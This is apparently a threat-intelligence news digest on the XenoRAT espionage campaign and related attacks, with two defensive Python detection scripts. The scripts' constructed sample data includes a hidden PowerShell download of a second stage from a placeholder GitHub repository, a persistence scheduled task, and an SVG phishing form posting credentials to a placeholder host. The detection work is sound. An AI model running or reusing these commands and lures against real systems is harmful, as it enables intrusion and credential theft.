
XenoRAT malware campaign targets foreign embassies in South Korea

📰 3 unique sources, 3 articles

Summary


A state-sponsored espionage campaign has targeted foreign embassies in South Korea since March 2025, deploying the XenoRAT malware from malicious GitHub repositories. The campaign has launched at least 19 spearphishing attacks against high-value targets, including Central and Western European embassies. The activity is attributed to the North Korean actor Kimsuky (APT43) with medium confidence, although several indicators point to possible Chinese involvement: operator activity largely originated from a timezone consistent with China, and the timing of pauses around holidays points the same way. XenoRAT is a full-featured trojan capable of logging keystrokes, capturing screenshots, accessing webcams and microphones, transferring files, and providing a remote shell. The lures were highly contextual, multilingual emails, often timed to match real events, carrying password-protected archives that contained malicious .LNK shortcut files; a decoy document was displayed to mask the malicious activity. The XenoRAT payload was staged on cloud storage such as Dropbox and Daum Cloud. The attackers rotated infrastructure rapidly to avoid detection, relied on cloud infrastructure to let malicious traffic fly under the radar, and used Korean services and infrastructure to blend into the South Korean network.

Timeline

  1. 18.08.2025 22:38 📰 3 articles

    XenoRAT malware campaign targets foreign embassies in South Korea

    Details reported across the three articles, beyond the summary above: the malware is delivered as a password-protected ZIP hosted on cloud services (Dropbox, Daum Cloud). Inside is a Windows shortcut (.LNK) masquerading as a PDF document; opening it executes the payload while a decoy document is shown. The shortcut fetches the next-stage malware from GitHub and establishes persistence through a scheduled task, after which XenoRAT is deployed. Infrastructure was rotated rapidly, with payloads updated multiple times within an hour. The campaign dates from March 2025, comprises at least 19 spearphishing attacks against embassies in South Korea including Central and Western European missions, and is attributed with medium confidence to Kimsuky (APT43), with timezone and holiday-pause analysis pointing to possible Chinese involvement.

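The delivery chain above (shortcut posing as a PDF, a script host pulling the next stage from GitHub, then a scheduled task for persistence) is the kind of sequence an endpoint detection rule can pair up. The following is an added example written for this page, not code from any of the cited articles or from the malware: it scores constructed process-creation events (the hosts, paths, repository names and task names are invented, not IOCs from the campaign) and flags a host where an explorer.exe-spawned script host fetches from GitHub and is followed by schtasks /create within a short window. It also checks file names for the double-extension masquerade.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Process images that commonly act as the first stage when a shortcut is opened.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "rundll32.exe"}
# GitHub-hosted next stage (assumed host list; tune to your environment).
GITHUB_RE = re.compile(
    r"https?://(raw\.githubusercontent\.com|github\.com|objects\.githubusercontent\.com)/", re.I)
SCHTASKS_CREATE_RE = re.compile(r"\bschtasks(?:\.exe)?\b.*?\s/create\b", re.I)
# A document extension immediately before .lnk, e.g. "Invitation.pdf.lnk".
MASQUERADE_RE = re.compile(r"\.(?:pdf|docx?|xlsx?|pptx?|hwp|txt)\.lnk$", re.I)


@dataclass(frozen=True)
class ProcEvent:
    ts: datetime          # event time (UTC)
    host: str
    parent_image: str     # full path of the parent process
    image: str            # full path of the created process
    command_line: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_masquerading_shortcut(filename: str) -> bool:
    """True for a shortcut whose name is built to pass as a document."""
    return bool(MASQUERADE_RE.search(basename(filename)))


def is_github_fetch_from_shortcut(ev: ProcEvent) -> bool:
    """explorer.exe (the shortcut launcher) spawned a script host that pulls from GitHub."""
    return (basename(ev.parent_image) == "explorer.exe"
            and basename(ev.image) in SCRIPT_HOSTS
            and GITHUB_RE.search(ev.command_line) is not None)


def is_task_persistence(ev: ProcEvent) -> bool:
    return (basename(ev.image) == "schtasks.exe"
            and SCHTASKS_CREATE_RE.search(ev.command_line) is not None)


def find_chains(events, window=timedelta(minutes=10)):
    """Pair each GitHub fetch with the first schtasks /create on the same host
    inside `window`. Returns a list of (host, fetch_event, persistence_event)."""
    ordered = sorted(events, key=lambda e: e.ts)
    chains = []
    for i, fetch in enumerate(ordered):
        if not is_github_fetch_from_shortcut(fetch):
            continue
        for later in ordered[i + 1:]:
            if later.ts - fetch.ts > window:
                break                      # events are sorted, nothing later can qualify
            if later.host == fetch.host and is_task_persistence(later):
                chains.append((fetch.host, fetch, later))
                break
    return chains


# Constructed sample telemetry (invented hosts, paths, URLs and task names).
T0 = datetime(2025, 8, 18, 9, 0, 0)
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # Victim opens the shortcut: explorer launches hidden PowerShell that fetches stage 2 from GitHub.
    ProcEvent(T0, "emb-ws01", r"C:\Windows\explorer.exe", PS,
              r'powershell.exe -w hidden -c "iwr https://raw.githubusercontent.com/example-org/notes/main/s2.txt -OutFile $env:TEMP\s2.ps1"'),
    # Same host, 40 s later: a scheduled task is registered to rerun the stage.
    ProcEvent(T0 + timedelta(seconds=40), "emb-ws01", PS, r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /create /sc minute /mo 15 /tn "OneDriveUpdate" /tr "powershell -w hidden -f %TEMP%\s2.ps1" /f'),
    # Benign: a developer downloads a release from GitHub; no persistence follows.
    ProcEvent(T0 + timedelta(minutes=2), "dev-ws07", r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c curl -L https://github.com/example/tool/releases/download/v1/tool.zip -o tool.zip"),
    # Benign: an admin creates a backup task from the management console on another host.
    ProcEvent(T0 + timedelta(minutes=3), "srv-bk02", r"C:\Windows\System32\mmc.exe", r"C:\Windows\System32\schtasks.exe",
              r"schtasks.exe /create /tn NightlyBackup /tr backup.cmd /sc daily /st 02:00"),
]


if __name__ == "__main__":
    for host, fetch, persist in find_chains(SAMPLE_EVENTS):
        print(f"{host}: GitHub fetch at {fetch.ts:%H:%M:%S} followed by: {persist.command_line}")
```

The pairing is what keeps the rule usable: a GitHub download alone is routine on developer workstations, and schtasks /create alone is routine for administrators, but the two in sequence from an explorer.exe-launched script host on the same machine are rare. The 10-minute window and the host list in GITHUB_RE are assumptions to adjust for your telemetry.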

Similar Happenings

APT41 Targets U.S. Trade Officials in Cyber Espionage Campaign

The House Select Committee on China has warned of ongoing cyber espionage by the China-linked group APT41 against U.S. trade officials and related organizations, coinciding with contentious U.S.-China trade negotiations. The attacks use phishing emails that impersonate U.S. officials to steal sensitive information and gain unauthorized access to systems, and the operators abuse legitimate software and cloud services to cover their tracks. The committee noted similar tactics in earlier activity, including a January 2025 spear-phishing attempt against committee staffers; the FBI is investigating the ongoing campaign. APT41 conducts financially motivated operations alongside state-sponsored espionage and has targeted the logistics, utilities, healthcare, high-tech and telecommunications sectors. The committee recommends phishing-awareness training for users, mandatory multifactor authentication, FIDO security keys, and appropriate email gateway and endpoint security tools to mitigate such attacks.

Kazakhstan's KazMunayGas Phishing Test Mistaken for Noisy Bear Campaign

KazMunayGas, Kazakhstan's state-owned oil and gas company, conducted an internal phishing test in May 2025 that Seqrite Labs initially reported as a cyber espionage campaign by a new threat group it tracked as Noisy Bear, believed to be of Russian origin and active since at least April 2025. The emails, sent from a compromised internal address belonging to a finance department employee, mimicked mundane company business: policy updates, internal certification procedures, work schedules, incentive systems and salary adjustments. Each carried a ZIP attachment containing a decoy document, a README.txt with instructions and a Windows shortcut (LNK) downloader named "Salary Schedule.lnk". The stated purpose of the test was to train employees to recognise and respond to phishing attempts.

According to Seqrite's analysis, the LNK file downloaded a batch script that retrieved a PowerShell loader dubbed DOWNSHELL (DownShell), consisting of two scripts: one for anti-analysis, undermining the Windows Antimalware Scan Interface (AMSI), and one performing CreateRemoteThread injection to establish a reverse shell; a DLL-based implant was also described. The infrastructure was hosted with Aeza Group, a sanctioned Russian bulletproof hosting provider, and Seqrite found infrastructure and tooling overlaps with other Central Asian attacks, suggesting a broader campaign. Given the target, the largest oil and gas company in Kazakhstan and a significant economic entity, the activity was read as carrying geopolitical implications.

The episode highlights the importance of clear communication and coordination between security researchers and organisations so that authorised tests are not reported as live threats and cyber threat reporting stays accurate.

SVG Files Used to Deploy Phishing Pages in Colombian Judicial System Impersonation Campaign

A malware campaign leveraging SVG files to deploy Base64-encoded phishing pages impersonating the Colombian judicial system has been identified. The SVG files, distributed via email, carry JavaScript that injects a phishing page into the browser and downloads a ZIP archive. 523 unique SVG files have been found, none of them detected by antivirus engines at the time of analysis; the earliest sample dates to August 14, 2025. The campaign illustrates how threat actors keep changing delivery formats to bypass security controls. The same reporting notes broader concurrent trends, including information stealers such as Atomic macOS Stealer (AMOS) targeting macOS systems and gamers.
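A triage script for this technique needs to find script in an SVG (inline &lt;script&gt; or event-handler attributes), decode any long Base64 run it carries, and look at what the decoded content does. The block below is an added example written for this page, not code from the researchers who reported the campaign; the sample SVG and the phishing HTML inside it are constructed here (the example.invalid host is a placeholder), not one of the 523 files. It falls back to a regex scan when the file is not well-formed XML, which attacker-crafted files often are not.

```python
import base64
import binascii
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
# A run of Base64 alphabet long enough to be a payload rather than an identifier.
B64_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
EVENT_ATTRS = {"onload", "onclick", "onmouseover", "onerror", "onbegin"}
SCRIPT_FALLBACK_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)


def script_bodies(svg_text: str) -> list[str]:
    """Inline <script> bodies and event-handler attribute values in an SVG.
    Falls back to a regex scan if the file is not well-formed XML."""
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError:
        return [re.sub(r"^\s*<!\[CDATA\[|\]\]>\s*$", "", m)
                for m in SCRIPT_FALLBACK_RE.findall(svg_text)]
    found = []
    for el in root.iter():
        if el.tag.rsplit("}", 1)[-1].lower() == "script" and el.text and el.text.strip():
            found.append(el.text)
        found.extend(v for k, v in el.attrib.items() if k.lower() in EVENT_ATTRS)
    return found


def decode_b64_payloads(text: str) -> list[str]:
    """Decode every long Base64 run that yields UTF-8 text; skip anything else."""
    out = []
    for blob in B64_BLOB_RE.findall(text):
        try:
            out.append(base64.b64decode(blob, validate=True).decode("utf-8"))
        except (binascii.Error, UnicodeDecodeError):
            continue
    return out


def analyze_svg(svg_text: str) -> dict:
    scripts = script_bodies(svg_text)
    payloads = [p for s in scripts for p in decode_b64_payloads(s)]
    return {
        "has_script": bool(scripts),
        "decoded_payloads": payloads,
        # Decoded content that rewrites the document as an HTML page (the phishing page itself).
        "html_injection": any(re.search(r"<(?:html|body|form|iframe)\b", p, re.I) for p in payloads),
        # Decoded content that points at an archive download.
        "archive_download": any(re.search(r"https?://\S+\.zip\b", p, re.I) for p in payloads),
    }


# Constructed sample: a 1x1 SVG whose script decodes an embedded Base64 HTML login
# form and writes it over the page. Not one of the campaign's files.
PHISH_HTML = ('<html><body><form action="https://example.invalid/login" method="post">'
              '<input name="user"><input name="pass" type="password"></form>'
              '<a href="https://example.invalid/Notificacion.zip">Descargar</a></body></html>')
SAMPLE_SVG = (
    f'<svg xmlns="{SVG_NS}" width="1" height="1"><rect width="1" height="1" fill="#fff"/>'
    '<script type="text/javascript"><![CDATA['
    f'var p="{base64.b64encode(PHISH_HTML.encode()).decode()}";'
    'document.open();document.write(atob(p));document.close();'
    ']]></script></svg>'
)
BENIGN_SVG = f'<svg xmlns="{SVG_NS}" viewBox="0 0 10 10"><circle cx="5" cy="5" r="4"/></svg>'


if __name__ == "__main__":
    for name, svg in (("sample", SAMPLE_SVG), ("benign", BENIGN_SVG)):
        result = analyze_svg(svg)
        print(name, {k: v for k, v in result.items() if k != "decoded_payloads"})
```

Two caveats for use on real mail attachments: parse untrusted XML with a hardened parser (for example defusedxml) rather than the standard library, since a hostile file can be built to exhaust the parser, and treat any SVG containing script as suspicious regardless of what the decoder recovers, because the payload may be split, reversed or otherwise obfuscated so that no single Base64 run decodes cleanly.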

Iranian Homeland Justice Group Targets Global Embassies in Phishing Campaign

Homeland Justice, an Iranian-aligned group, conducted a coordinated, multi-wave spear-phishing campaign against embassies and consulates in Europe and other regions. The emails, sent from compromised accounts and disguised as legitimate diplomatic communications, exploited current geopolitical tensions to lure recipients into opening malicious Microsoft Word documents. The resulting malware establishes persistence, contacts a command-and-control server and harvests system information. The campaign began on August 19, 2025, reached around four dozen embassies, consulates and government ministries worldwide as well as several international organizations, and is assessed to have ended shortly after it started, with the attackers' command-and-control infrastructure now appearing inactive. It is viewed as part of a broader regional espionage effort against diplomatic and governmental entities during a period of heightened geopolitical tension.

Cloudflare mitigates 11.5 Tbps UDP flood DDoS attack

Cloudflare recently mitigated the largest volumetric DDoS attack on record, a UDP flood that peaked at 11.5 Tbps and lasted approximately 35 seconds. The traffic originated from a combination of IoT devices and cloud providers, including Google Cloud; Google's abuse defenses detected the activity and Google followed its customer notification and response protocol. The attack was one of hundreds of hyper-volumetric attacks Cloudflare has automatically mitigated in recent weeks, the largest of which peaked at 5.1 Bpps and 11.5 Tbps. Such floods are launched from botnets of malware-infected devices. The RapperBot kill chain is one example: it targets network video recorders (NVRs) and other IoT devices, exploiting a path traversal flaw to leak valid administrator credentials and pushing a fake firmware update to gain initial access and download its payload, then establishes an encrypted connection to a C2 domain to receive DDoS commands and scans the internet for open ports to propagate. More generally, operators scan the internet for old edge devices and brute-force or exploit them to run the botnet malware.

Cloudflare reports a steep rise in DDoS activity: a 198% quarter-over-quarter increase and a 358% year-over-year jump in 2024, during which it mitigated 21.3 million attacks against customers and 6.6 million attacks against its own infrastructure in an 18-day multi-vector campaign. Network-layer attacks showed the sharpest spike, up 509% year-over-year since the start of 2025. Volumetric attacks aim to overwhelm servers or networks until they slow or stop entirely, but the 35-second duration of this one shows that size alone is not the most critical metric: the complexity and persistence of an attack, and its impact on users, matter more for DDoS defense.

Separately, a DDoS mitigation service provider in Europe was hit by a 1.5 Bpps packet-rate flood, one of the largest publicly disclosed. It was primarily a UDP flood launched from compromised customer-premises equipment (CPE), including IoT devices and MikroTik routers, across more than 11,000 unique networks worldwide. FastNetMon detected it in real time and mitigation was applied through the customer's DDoS scrubbing facility. FastNetMon's founder, Pavel Odintsov, called for ISP-level intervention to stop the weaponization of compromised consumer hardware.